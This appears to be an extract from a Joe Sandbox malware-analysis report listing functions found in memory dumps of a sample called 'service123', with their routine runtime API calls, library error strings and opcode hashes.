Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f1bd12e066b87f622b51513ecc57455043996a36f753dbf0e65843d87dc8b550
Instruction ID: 904a434ae59165a776ee750de4a2b43ed51624c455eff29601442a8f29d08bf1
Opcode Fuzzy Hash: f1bd12e066b87f622b51513ecc57455043996a36f753dbf0e65843d87dc8b550
Instruction Fuzzy Hash: 8941E67171A308CBCB40AF78C4816AAB7A5EF8231CF144A6DD8848BB15DB369449CF97

Function 6C2B1020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6C2B1281,?,?,?,?,?,?,6C2B13AE), ref: 6C2B1057
_amsg_exit.MSVCRT ref: 6C2B1086

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: b2365a7ec73ca4c32b6c62c9cd0c8b65eb6a464888a3bf428675f28bec71ee6e
Instruction ID: 4cbe2a672074b6c8148200f02c975c3f05c5f6b8a14cb939f26ea717fda424be
Opcode Fuzzy Hash: b2365a7ec73ca4c32b6c62c9cd0c8b65eb6a464888a3bf428675f28bec71ee6e
Instruction Fuzzy Hash: C4318E71718245CBDB00AF6DC58179A77F8EB463CCF118929ED489BA84DB31E484DB92

Function 6C2D1F00 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C2D1F18
strlen.MSVCRT ref: 6C2D1F22
memcpy.MSVCRT ref: 6C2D1F3F
setlocale.MSVCRT ref: 6C2D1F52
wcsftime.MSVCRT ref: 6C2D1F76
setlocale.MSVCRT ref: 6C2D1F88

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction ID: 1f536eefdeb2be0b9a7c3bc2895c9f2a21d6f68ca4890ff19c11dcd8f9a97dfc
Opcode Fuzzy Hash: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction Fuzzy Hash: CD1195B0609714AFC380BF69C18465ABBE4BF88758F42892DE8C887750E7799854CB93

Function 6C2D1C50 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C2D1C68
strlen.MSVCRT ref: 6C2D1C72
memcpy.MSVCRT ref: 6C2D1C8F
setlocale.MSVCRT ref: 6C2D1CA2
strftime.MSVCRT ref: 6C2D1CC6
setlocale.MSVCRT ref: 6C2D1CD8

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction ID: 65ee8fb08e03b17da2c62b22b360d36109a5acad5cd960e1d9fba763fbeb944e
Opcode Fuzzy Hash: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction Fuzzy Hash: DD11C2B060A714AFC380BF69C08475ABBE4BF84658F428D2DE8C887741E7799854CB93

Function 6C2BED31 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction ID: 4edcc5120bd13fc1185c8087b2686887e9b4e9d4c2c16e8920d4fabdd5388c64
Opcode Fuzzy Hash: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction Fuzzy Hash: 0EB01232DD926DC5C42075BC04103DAA21DDB033CCF00090BCD5A73C088632B08749A7

Function 6C2CE0D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 6C2CE117
LocalFree.KERNEL32 ref: 6C2CE14B

Strings

Unknown error code, xrefs: 6C2CE18C
basic_string: construction from null is not valid, xrefs: 6C2CE1A7

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: 24d9c26e50619f9c2411a029df5de9e41c0142746415a5d15dc732849d33131e
Instruction ID: a77cb72219e06a3d4d2a22643a098db466c2c67251c2ddfdb7f4cec70a624f79
Opcode Fuzzy Hash: 24d9c26e50619f9c2411a029df5de9e41c0142746415a5d15dc732849d33131e
Instruction Fuzzy Hash: 9A415AB1A057099FCB00AF69C48669EFBF4EF85758F41882CE9849BB10E77494488FD3

Function 6C2C3659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2C3567
fputc.MSVCRT ref: 6C2C35D7
memset.MSVCRT ref: 6C2C3692

Strings

o, xrefs: 6C2C369A
0, xrefs: 6C2C3687

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction ID: c1891ddf91dec89cd930b31b831214b8896c6a7c9d7df835c88abdc78e1331d8
Opcode Fuzzy Hash: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction Fuzzy Hash: 6B313C71B087098BC740CF69C0807E9BBF1BF48354F148B59E999ABB41D734E805CB52

Function 00AC2F89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00AC2E97
fputc.MSVCRT ref: 00AC2F07
memset.MSVCRT ref: 00AC2FC2

Strings

o, xrefs: 00AC2FCA
0, xrefs: 00AC2FB7

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction ID: 39e004eed6df285031d9f583713f930e03766af55dd3322292685ea48fa0b37d
Opcode Fuzzy Hash: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction Fuzzy Hash: 0A317C72A04305CFCB11CF68C094BAABBF1BF58710F16852DD999AB751D738E940CB50

Function 6C2B9490 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6C2B94C2
strlen.MSVCRT ref: 6C2B9616

Strings

_GLOBAL_, xrefs: 6C2B94B7

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: ca4f043923644d2c9983b4ca10a019442da0b685f888d703e50f34f9231fb85b
Instruction ID: 44146f12b32441aed24c58744fbc066b8ef54359c36a4527b451b9f7c0ed8398
Opcode Fuzzy Hash: ca4f043923644d2c9983b4ca10a019442da0b685f888d703e50f34f9231fb85b
Instruction Fuzzy Hash: D0F18DB0D0422D8FEB20DF29C8903D9BBF5AF46348F0441EAD858BB645D7759A99CF81

Function 6C32DAB0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 6C34F8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C32DA2E), ref: 6C34F95D
Part of subcall function 6C34F8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C32DA2E), ref: 6C34F988

memcpy.MSVCRT ref: 6C32DCB5

Part of subcall function 6C352530: memcpy.MSVCRT(?,-00000001,?,6C2D749E,?,?,?,?,?,?,?,?,?,?,?,6C2D8E25), ref: 6C35256C

Strings

Unknown error, xrefs: 6C32DB08
iostream error, xrefs: 6C32DD08
basic_string::append, xrefs: 6C32DDB2, 6C32DDBE

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: 60e76b5dad241f3ea335582b581c58dcc4e63f61dc9eed56bafa247f3b724c6a
Instruction ID: fe714fd430bb1e5f1ffd7293495552004517aefcdeb76f99420405fe1c27e2d2
Opcode Fuzzy Hash: 60e76b5dad241f3ea335582b581c58dcc4e63f61dc9eed56bafa247f3b724c6a
Instruction Fuzzy Hash: AFA10575D09318CBCB10EFA8C48069DBBF5BF45314F24892ED898ABB50E735A845CF92

Function 6C31BF60 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C31C03F
memcpy.MSVCRT ref: 6C31C099
memcpy.MSVCRT ref: 6C31C127

Part of subcall function 6C31C500: memcpy.MSVCRT ref: 6C31C58C

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C31C1B3
basic_string::replace, xrefs: 6C31C194, 6C31C1A7

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 83ff73eaf653614366ce80287cc0985c992d4fc2c78358cfa082952d10272b94
Instruction ID: 458963de7714477e9ed6cf0a11ad3cfb1c9bdeffd9b034a4159fd0b0a60601c5
Opcode Fuzzy Hash: 83ff73eaf653614366ce80287cc0985c992d4fc2c78358cfa082952d10272b94
Instruction Fuzzy Hash: D7813875A092159FCB04EF28D48059EBBF5FF88758F11892DE89887B10E731D954CF92

Function 6C325000 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C3250D0
memcpy.MSVCRT ref: 6C325124
memcpy.MSVCRT ref: 6C3251B8

Part of subcall function 6C325590: memcpy.MSVCRT ref: 6C325620

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C325248
basic_string::replace, xrefs: 6C325229, 6C32523C

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 77972a739c367dfff5af47703a91b0082dc47a4705ac0c43d1c2f3d3cf13f23b
Instruction ID: bde1ecf251bb9199eacee0e93a213501f88727457fc31307f1ad1f09cfdf91e1
Opcode Fuzzy Hash: 77972a739c367dfff5af47703a91b0082dc47a4705ac0c43d1c2f3d3cf13f23b
Instruction Fuzzy Hash: C0812675A093059FCB00DF68C88069EFBF5AF89354F108A2EE899D7714D735EA448F92

Function 6C32D810 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C34F8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C32DA2E), ref: 6C34F95D
Part of subcall function 6C34F8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C32DA2E), ref: 6C34F988

strlen.MSVCRT ref: 6C32D8E5
memcpy.MSVCRT ref: 6C32D9BE

Strings

Unknown error, xrefs: 6C32D85E
iostream error, xrefs: 6C32DA12

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: 8d91e05c3cc0378e0cf7e784dda154bdff7e48df67ed72ce7589440010bd7771
Instruction ID: e98d48aa234ea1337c650430c67d6f9a23f5e5bea2a1fd89cc1ec99f25b51002
Opcode Fuzzy Hash: 8d91e05c3cc0378e0cf7e784dda154bdff7e48df67ed72ce7589440010bd7771
Instruction Fuzzy Hash: 4161D574904308CFDB04DFA9C08469EBBF1BF88314F24852EE8999B755E7759844CF92

Function 6C2BF840 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2BF85F
ReleaseSemaphore.KERNEL32 ref: 6C2BF8E3

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: 0ff596242137942094f80a23da23484a3ed66057901d684524b3682ce819e47c
Instruction ID: dbe53fea1b4f1dabadc4080fc4f830155deabf5fde64ff21ef960f7bf05faeb7
Opcode Fuzzy Hash: 0ff596242137942094f80a23da23484a3ed66057901d684524b3682ce819e47c
Instruction Fuzzy Hash: 7E3147B860A306CFDB00EF29C5487877BF8BB47359F15865DE8589B284D334A4498B92

Function 6C2BFCE0 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2BFCEC
ReleaseSemaphore.KERNEL32 ref: 6C2BFD7C
CreateSemaphoreW.KERNEL32 ref: 6C2BFDC7
WaitForSingleObject.KERNEL32 ref: 6C2BFE10

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: d3c65069e2ffe53b85d688e6c8519b6b9eea84c0917ab317ad6d0556c014337d
Instruction ID: 930b707a6f05929adf34c73736efa5dce3571d4484cf73754fbe31ed02107d91
Opcode Fuzzy Hash: d3c65069e2ffe53b85d688e6c8519b6b9eea84c0917ab317ad6d0556c014337d
Instruction Fuzzy Hash: E03146B860A306CFDB01AF29C5487977BF8BB0735DF118259E8589B284D734E449CB92

Function 6C378520 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C378535
strlen.MSVCRT ref: 6C378583
memcpy.MSVCRT ref: 6C3785A0
setlocale.MSVCRT ref: 6C3785B4
setlocale.MSVCRT ref: 6C3785EA

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 4078a1d82af99d0a9eb48beb8df2f4db84d636e83892c315e079d8d9cc5f8f61
Instruction ID: 3fe26b40742cab7c187a6d1c1aeba16217b7840bd42c460dc33e55a77e3d6668
Opcode Fuzzy Hash: 4078a1d82af99d0a9eb48beb8df2f4db84d636e83892c315e079d8d9cc5f8f61
Instruction Fuzzy Hash: F221CFB46093549FD380EF29D48065EBBE0EF88658F058A6EE9C887701E339C944CF83

Function 6C2C9530 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6C2C9549
_unlock.MSVCRT ref: 6C2C9571
calloc.MSVCRT ref: 6C2C95BF

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction ID: 1e6c1eba8e99a390e265bd888a30a6d86a203f0946a1077c3c31473bdd8c1f76
Opcode Fuzzy Hash: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction Fuzzy Hash: A7113A71604215CFD780AF28C580696BBE4AF89388F1586A9D898CB745EB34D854CB92

Function 6C2C0290 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2C02BC
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C2C04DE), ref: 6C2C02CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C2C04DE), ref: 6C2C0300

Memory Dump Source

